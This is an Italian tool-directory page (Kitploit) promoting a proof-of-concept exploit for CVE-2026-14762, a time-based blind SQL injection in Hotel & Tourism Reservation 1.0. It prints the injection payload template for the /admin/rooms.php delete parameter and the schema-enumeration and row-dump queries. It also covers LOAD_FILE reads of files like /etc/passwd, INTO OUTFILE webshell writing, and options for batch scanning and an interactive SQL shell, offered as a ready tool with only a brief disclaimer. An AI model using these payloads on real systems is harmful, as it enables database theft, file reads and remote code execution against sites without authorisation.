Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/tc4dy/cve-2026-14762-poc-exploit
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingCommand and ControlRed TeamingSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
CVE-2026-14762-PoC-Exploit — Exploit di SQL injection blind basata sul tempo multi-thread per CVE-2026-14762 che ha come target Hotel & Tourism Reservation 1.0. Enumera database, tabelle e colonne; legge file tramite LOAD_FILE; scrive webshell PHP per RCE. Supporta proxy, scansione batch e shell SQL interattiva. | Kitploit
Sicurezza dei Database
GitHubtc4dy/cve-2026-14762-poc-exploit

CVE-2026-14762-PoC-Exploit

Vedi Repository
211 mese faNon ancora revisionato

Informazioni

Exploit di SQL injection blind basata sul tempo multi-thread per CVE-2026-14762 che ha come target Hotel & Tourism Reservation 1.0. Enumera database, tabelle e colonne; legge file tramite LOAD_FILE; scrive webshell PHP per RCE. Supporta proxy, scansione batch e shell SQL interattiva.

Condividi

CVE-2026-14762 – Exploit di SQL injection per Code‑Projects Hotel & Tourism Reservation 1.0

Python 3.11+ License CVSS CWE

Exploit di SQL injection blind time‑based, multi‑thread e completo per CVE‑2026‑14762.
Prende di mira l'endpoint /admin/rooms.php dell'applicazione Code‑Projects Hotel & Tourism Reservation (versione 1.0).
Consente l'enumerazione completa del database, la lettura del file system (LOAD_FILE) e la scrittura arbitraria di file (INTO OUTFILE / DUMPFILE) – portando all'esecuzione remota di codice tramite il deploy di una webshell.

CVE Exploit


🚀 Caratteristiche


📦 Requisiti

  • Python ≥ 3.11
  • Pacchetti Python:
    • requests
    • urllib3
    • colorama (opzionale – per output colorato nel terminale)

Installa tutte le dipendenze con:

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-14762-PoC-Exploit.git

cd CVE-2026-14762-PoC-Exploit

chmod +x exploit.py or basic_exploit.py

📖 Utilizzo

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-14762-PoC-Exploit.git

cd CVE-2026-14762-PoC-Exploit

chmod +x exploit.py or basic_exploit.py

📖 Argomenti della riga di comando


⚙️ Come funziona

Costruzione del payload

Il parametro delete viene iniettato con:

root@kitploit:~
150' AND IF(<condition>, SLEEP(<delay>), 0) AND '1'='1

La funzione IF() valuta la condizione; se vera, il database rimane in attesa per secondi. Estrazione dei caratteri tramite ricerca binaria

Per ogni posizione del carattere, una ricerca binaria sull'intervallo ASCII (32–126) determina il carattere corretto utilizzando i confronti > e =. Ciò riduce le richieste da 95 per carattere a ~7–8, rendendo l'estrazione estremamente efficiente. Enumerazione dei metadati

root@kitploit:~
Nome del database: SELECT DATABASE()

Tabelle: SELECT table_name FROM information_schema.tables WHERE table_schema='<db>' LIMIT n,1

Colonne: SELECT column_name FROM information_schema.columns WHERE table_schema='<db>' AND table_name='<table>' LIMIT n,1

Esfiltrazione dei dati

root@kitploit:~
SELECT <col> FROM <table> LIMIT row,1 – estrae riga per riga

Ogni cella viene estratta carattere per carattere utilizzando la stessa tecnica di ricerca binaria

Interazione con il file system

root@kitploit:~
Lettura: LOAD_FILE('/path/to/file') – richiede che secure_file_priv sia vuoto o punti alla directory di destinazione

Scrittura: SELECT '<content>' INTO OUTFILE '/path/to/shell.php' – richiede il privilegio FILE e che secure_file_priv non sia restrittivo

🛡️ Disclaimer

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati, ricerca educativa e valutazione delle vulnerabilità. L'autore non è responsabile per qualsiasi uso improprio, attività illegali o danni causati da questo software. Ottenere sempre il permesso scritto esplicito dal proprietario del sistema prima di eseguire qualsiasi test.

Scarica lo strumento
CategoriaCapacità
VulnerabilitàSQL injection blind time‑based (CWE‑89)
Vettore d'attaccoGET /admin/rooms.php?delete=<payload>
SfruttamentoIniezione condizionale SLEEP() con estrazione caratteri tramite ricerca binaria
DatabaseEstrazione del nome del database corrente
SchemaEnumerazione di tabelle e colonne tramite information_schema
Dump dei datiEsportazione completa della tabella (JSON) – righe illimitate, limite configurabile
Lettura fileLOAD_FILE() – legge qualsiasi file leggibile da MySQL (es. /etc/passwd, file di configurazione)
Scrittura fileINTO OUTFILE / DUMPFILE – scrive webshell PHP, backdoor o contenuti arbitrari
Shell interattivaShell SQL live (estrazione time‑based) per query manuali
Query singolaEsegue SQL ad‑hoc e recupera i risultati (limite 512 caratteri)
Modalità batchScansione multi‑target con thread pool configurabile (ThreadPoolExecutor)
Supporto proxyProxy HTTP/HTTPS (Burp Suite, mitmproxy, ecc.)
Logging verbosoOutput colorato con informazioni di debug con timestamp
Zero dipendenzeSolo requests, urllib3 e colorama (opzionale)
ArgomentoBreveTipoPredefinitoDescrizione
--target-tURL—URL del singolo target (es. http://192.168.1.100)
--target-file-lFile—File contenente l'elenco dei target (uno per riga)
--threads—Int5Numero di thread per la scansione multi-target
--output-oPath—File di output (JSON per i dump, testo grezzo per i file)
--verbose-vFlagFalseAbilita il logging di debug verboso
--proxy—URL—Proxy HTTP/HTTPS (es. http://127.0.0.1:8080)
--user-agent-uaStringMozilla/5.0...Header User-Agent personalizzato
--delay—Float5.0Tempo di attesa in secondi per l'iniezione blind
--max-retries—Int3Numero massimo di tentativi di richiesta
--ssl-verify—FlagFalseAbilita la verifica del certificato SSL
--webroot—Path/var/www/htmlWebroot per la scrittura di webshell tramite INTO OUTFILE
--dump-db—FlagFalseEsegue il dump di tutte le tabelle del database corrente
--tables—FlagFalseElenca solo i nomi di tutte le tabelle
--dump-table—Table—Esegue il dump di una tabella specifica (es. --dump-table users)
--read—Path—Legge un file tramite LOAD_FILE()
--write-shell—FlagFalseScrive una webshell PHP (shell.php) nella webroot
--sql—Query—Esegue una singola query SQL (restituisce al massimo 512 caratteri)
--interactive-iFlagFalseAvvia una shell SQL interattiva dopo lo sfruttamento